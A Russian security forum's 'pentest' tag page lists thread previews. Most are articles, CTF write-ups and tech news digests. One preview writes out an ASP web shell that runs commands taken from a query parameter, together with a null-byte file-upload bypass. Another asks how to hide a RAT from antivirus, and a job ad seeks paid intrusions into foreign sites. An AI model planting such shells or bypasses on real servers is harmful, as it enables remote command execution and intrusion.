pentest

  1. szybnev

    Статья Скрываясь на виду у всех. №2

    You must be registered for see element. Это вторая часть статьи о проксировании загрузки DLL для скрытия подозрительных следов стека, ведущих к выделенной пользователем области RX. You must be registered for see element. Я не буду углубляться в то, как работает стек, потому что я уже...
  2. Frintezza

    Ошибка при загрузки оболочки asp

    Привет) пытаюсь загрузить оболочку но сервер выдает ошибку по началу сервер не давал закидавать .asp файл file.asp <%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%> потом я это обошел так: file.asp%00.jpg GIF89a; <%response.write...
  3. apache2

    Заметка Автоматизируем простые задачи на удалённой машине [Poor Man's Pentest]

    В этой статье я расскажу о том, как использовать и установить Poor Man's Pentest на примере создания полного интерактивного TTY шела (Fully Interactive TTY Shell) git clone https://github.com/JohnHammond/poor-mans-pentest.git cd poor-mans-pentest mkdir /opt/pmp cp functions.sh /opt/pmp/ Для...
  4. G

    CTF Проходим лёгкие комнаты TryHackMe #2

    Всем привет.В прошлой теме You must be registered for see element. я получил неплохую отдачу от вас и решил продолжить рассказывать про легкие комнаты THM.Я не буду расписывать моменты о которых уже говорил , буду стараться написать что-то уникальное , как минимум для меня:) Давайте начнем с...
  5. Demoness

    Pentest как научиться?

    Привет. Очень хотелось бы научитсья пентестингу и иметь такие знание. На форуме вижу много людей кто это знает и я думаю что, почему бы и нет. Как научиться? Что делать и как начать? Спасибо!
  6. Codeby News

    News 96% российских организаций не защищены от проникновения

    You must be registered for see element. Positive Technologies You must be registered for see element. результаты пентестов за 2021-2022 годы. Во всех компаниях был взят полный контроль над инфраструктурой. В 9 из 10 случаев злоумышленник получал доступ к коммерческим тайнам. В тесте на...
  7. Аудит безопасности Wifi роутера. Теория и практика! Aircrackng, Airgeddon!

    Аудит безопасности Wifi роутера. Теория и практика! Aircrackng, Airgeddon!

    Доброго всем времени суток! Представляем вам ролик, который расскажет вам, как защитить свой домашний, и не только, маршрутизатор. Познакомимся с защитой роутера и попробуем ее обойти! Приятного просмотра! __________________________________________________________________________ ⚠️ ⚠️ ⚠️...
  8. J

    Вопрос о криптографии.

    Здрав буде бояре!!! Буду безмерно благодарен если вы подскажете мне как можно закриптовать, скрыть деятельность вредоноса типа RAT. Сделать файл который при скачивании в тестовую среду не обнаруживается - это не проблема. Проблема в том что при установке и выполнении своих функций его...
  9. redlineo

    Статья В поисках туториала по пентесту

    You must be registered for see element. Последние год-полтора я медленно бродил по просторам интернета в поисках информации по становлению специалистом по ИБ и пентесту. В основном суть информации сводилась к "что нужно знать специалисту по ИБ", "что должен уметь специалист по ИБ". Это всё не...
  10. H

    Проверка почтового сервера

    Доброго времени суток. Мне интересно , как проводится аудит (белый бокс) почтового сервера? Компания вот например говорит хочу, чтоб проверили наш почтовый сервер. какие исходные данные нужны от заказчика и сколько стоит приблизительно, если заказать ?
  11. Crazy Jack

    Статья Нововведения Kali Linux 2022.3. Как обновиться?

    You must be registered for see element. 9 августа Offensive Security объявила о выпуске Kali Linux 2022.3. В своем объявлении Offensive Security подтвердила несколько новых вещей, недавно добавленных исключительно в эту третью версию 2022 года. Этот пост написан, чтобы читатели могли узнать...
  12. Вирус в UEFI | Алиса стала умнее | Печать Еды и другое

    Вирус в UEFI | Алиса стала умнее | Печать Еды и другое

    Не забудь заглянуть в описание! Там много интересного 👀 📆 В этом выпуске: ✔️ Алиса сможет связывать поисковые сессии между собой ✔️ Kaspersky CosmicStrand ✔️ Атомдата - виртуальный оператор ✔️ Microsoft не продлила SPLA контракт с Yandex Cloud ✔️ Microsoft решила проблему ✔️ Пищевой принтер ✔️...
  13. EasyHacking - Burpsuite. Часть 1я.

    EasyHacking - Burpsuite. Часть 1я.

    Рубрика роликов про вводную часть в пентест, здесь мы на пальцах будем разбирать те или иные утилиты которые подтолкнут вас в разнообразный мир пентеста. В данном ролике мы на примере CTF pickle rick, будем разбирать некоторые функции большой программы Burpsuite. Вы научитесь автоматизировать...
  14. SOC От Мегафон | Windows AutoPatch | Chrome OS | Apple Теряет дизайнера | и др.

    SOC От Мегафон | Windows AutoPatch | Chrome OS | Apple Теряет дизайнера | и др.

    Не забудь заглянуть в описание! Там много интересного 👀 📆 В этом выпуске: ✔️ Мегафон запускает свой SOC ✔️ Компании хотят начать использовать неназемные сети пятого поколения ✔️ ViPNet L2-10G получил сертификат ФСБ России ✔️ Технологию Bluetooth LE Audio приняли для беспроводных наушников ✔️...
  15. D

    Вакансия Разыскивается толковый пентестер

    Платежеспособный клиент ищет честного, ответственного и умелого исполнителя. Оплата в BTC, проекты для пентеста все иностранные (не РФ). Во избежание скама и всякого мошенничества, предоставим сайт для теста скилла. За успех с этим "тестовым" сайтом мы заплатим, как только получим неоспоримые...
  16. Lenovo | Nvidia | Rutube | Доставка дронами и др.

    Lenovo | Nvidia | Rutube | Доставка дронами и др.

    Не забудь заглянуть в описание! Там много интересного 👀 📆 В этом выпуске: ✔️ Lenovo MOZI ✔️ Яндекс. минимализм ✔️ Positive Technologies про атаку на RuTube ✔️ Доставка пенсии на беспилотнике ✔️ Xbox на Windows теперь проверяет производительность ос перед установкой игр ✔️ Очередные блокировки...
  17. Слежка | Zero-Day exploit | TikTok | Импортозамещение и другое

    Слежка | Zero-Day exploit | TikTok | Импортозамещение и другое

    Не забудь заглянуть в описание! Там много интересного 👀 📆 В этом выпуске: ✔️ Очередные блокировки и ограничения ✔️ Новый эквалайзер в Яндекс станциях ✔️ Новая фишинговая атака на пользователей Telegram ✔️ Началось внедрение системы распознавания силуэтов ✔️ Сбой в работе принтеров Canon...
  18. LINUX драйвера | Цифровое Импортрозамещение | Rutube | Блокировки

    LINUX драйвера | Цифровое Импортрозамещение | Rutube | Блокировки

    Не забудь заглянуть в описание! Там много интересного 👀 📺 Сегодня в выпуске: - NashStore выходит из альфа-тестирования - Сага о RuTube - Electronic Arts прекращает сотрудничество с ФИФА - Новая IT-компания “М.Тех” - Docker Desktop на GNU/Linux - NVIDIA открыла исходный код видеодрайверов для...
  19. Apple Платит каждому | Умные Болты | Сбербанк просит | Exploit SAMSUNG и другое

    Apple Платит каждому | Умные Болты | Сбербанк просит | Exploit SAMSUNG и другое

    Не забудь заглянуть в описание! Там много интересного 👀 📺 Сегодня в выпуске: - Уязвимость в магазине приложений Samsung - Сбер просит отключить удаление неиспользуемого ПО - 15$ от Apple, за 2015 год - Умный болт!? - Одноразовый SSD - Стандарт VESA для игровых мониторов - Редактор скриншотов...
  20. VISA/MasterCard Теряют деньги | "Премии" за шпионаж | Оплата лицом |  и другое

    VISA/MasterCard Теряют деньги | "Премии" за шпионаж | Оплата лицом | и другое

    Не забудь заглянуть в описание! Там много интересного 👀 📺 Сегодня в выпуске: - Очередные блокировки и ограничения - Международная премия большого брата - Weibo начала раскрывать IP и местоположение пользователей - Дистанционные кассиры и оплата взглядом - Ростех разработал Bluetooth-датчики...